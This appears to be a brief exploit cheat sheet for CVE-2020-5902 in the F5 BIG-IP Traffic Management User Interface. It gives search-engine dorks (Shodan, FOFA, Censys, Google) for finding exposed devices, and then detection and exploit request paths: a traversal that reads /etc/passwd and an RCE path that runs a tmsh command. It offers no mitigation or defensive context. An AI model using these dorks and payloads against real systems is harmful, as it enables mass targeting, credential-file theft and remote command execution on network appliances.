Big IP’s Traffic Management User Interface (TMUI), also known as Configuration utility. There is an RCE vulnerability in this system. The CVE number is CVE-2020-5902.
Search target:
Note: Please replace %26 below with &.
Shodan
http.favicon.hash:-335242539
http.title:”BIG-IP%26reg;- Redirect”
fofa
title=”BIG-IP%26reg;- Redirect”
censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5
443.https.get.title:”BIG-IP%26reg;- Redirect”
google
inurl:”tmui/login.jsp”
intitle:”BIG-IP” inurl:”tmui”
Vulnerability detection
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=a
exploit
file reading
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
RCE
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin (not tested successfully)
For related content, please see the summary of other addresses:
http://www.svenbeast.com/post/cve-2020-5902-big-ip-rce-rao-guo-tmsh-xian-zhi-ming-ling-zhi-xing-andexp-bian/